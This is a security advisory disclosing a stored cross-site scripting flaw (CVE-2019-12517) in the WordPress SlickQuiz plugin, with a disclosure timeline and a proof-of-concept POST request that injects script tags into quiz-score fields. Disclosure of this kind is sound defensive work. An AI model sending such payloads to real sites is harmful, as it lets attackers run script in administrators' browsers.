WordPress SlickQuiz 1.3.7.1 Cross Site Scripting

`RCE Security Advisory  
https://www.rcesecurity.com  
  
  
1. ADVISORY INFORMATION  
=======================  
Product: SlickQuiz  
Vendor URL: https://wordpress.org/plugins/slickquiz/  
Type: Cross-Site Scripting [CWE-79]  
Date found: 2019-05-30  
Date published: 2019-09-10  
CVSSv3 Score: 6.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)  
CVE: CVE-2019-12517  
  
  
2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.  
  
  
3. VERSIONS AFFECTED  
====================  
SlickQuiz for Wordpress 1.3.7.1 (latest)  
  
  
4. INTRODUCTION  
===============  
SlickQuiz is a plugin for displaying and managing pretty, dynamic quizzes. It  
uses the SlickQuiz jQuery plugin.  
  
(from the vendor's homepage)  
  
  
5. VULNERABILITY DETAILS  
========================  
The "save_quiz_score" functionality available to unauthenticated users via the  
Wordpress "/wp-admin/admin-ajax.php" endpoint allows unauthenticated users to  
submit quiz solutions/answers. If the configuration option "Save user scores"  
is enabled (disabled by default), the response is stored in the database and  
later shown in the Wordpress backend for all users with at least Subscriber  
rights.  
  
However, since the plugin does not properly validate and sanitize the quiz  
response, a malicious XSS payload in either the name, the email or the score  
parameter like:  
  
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0)  
Accept: */*  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 181  
DNT: 1  
Connection: close  
  
action=save_quiz_score&json={"name":"Na<script>alert(document.domain)</script>  
me","email":"info@local<script>alert(document.domain)</script>host",  
"score":"<script>alert(document.domain)</script>","quiz_id":1}  
  
is executed directly within the backend at "/wp-admin/admin.php?page=slickquiz"  
across all users with the privileges of at least subscriber and up to admin.  
  
  
6. RISK  
=======  
To successfully exploit this vulnerability an authenticated user must be tricked  
into visiting the SlickQuiz administrative backend on the affected Wordpress  
installation.  
  
The vulnerability can be used to permanently embed arbitrary script code into the  
administrative Wordpress backend, which offers a wide range of possible  
attacks such as redirecting the user to a malicious page, spoofing content on the  
page or attacking the browser and its plugins.  
  
  
7. SOLUTION  
===========  
None (Remove the plugin)  
  
  
8. REPORT TIMELINE  
==================  
2019-05-30: Discovery of the vulnerability during H1-4420  
2019-06-01: CVE requested from MITRE  
2019-06-02: MITRE assigns CVE-2019-12517  
2019-06-10: Contacted vendor using their publicly listed email address  
2019-06-19: Contacted vendor using their publicly listed email address  
2019-06-22: Contacted vendor using their publicly listed email address  
2019-08-28: No response from vendor.  
2019-09-10: Public disclosure.  
  
  
9. REFERENCES  
=============  
https://www.rcesecurity.com/2019/09/H1-4420-From-Quiz-to-Admin-Chaining-Two-0-Days-to-Compromise-an-Uber-Wordpress/  
`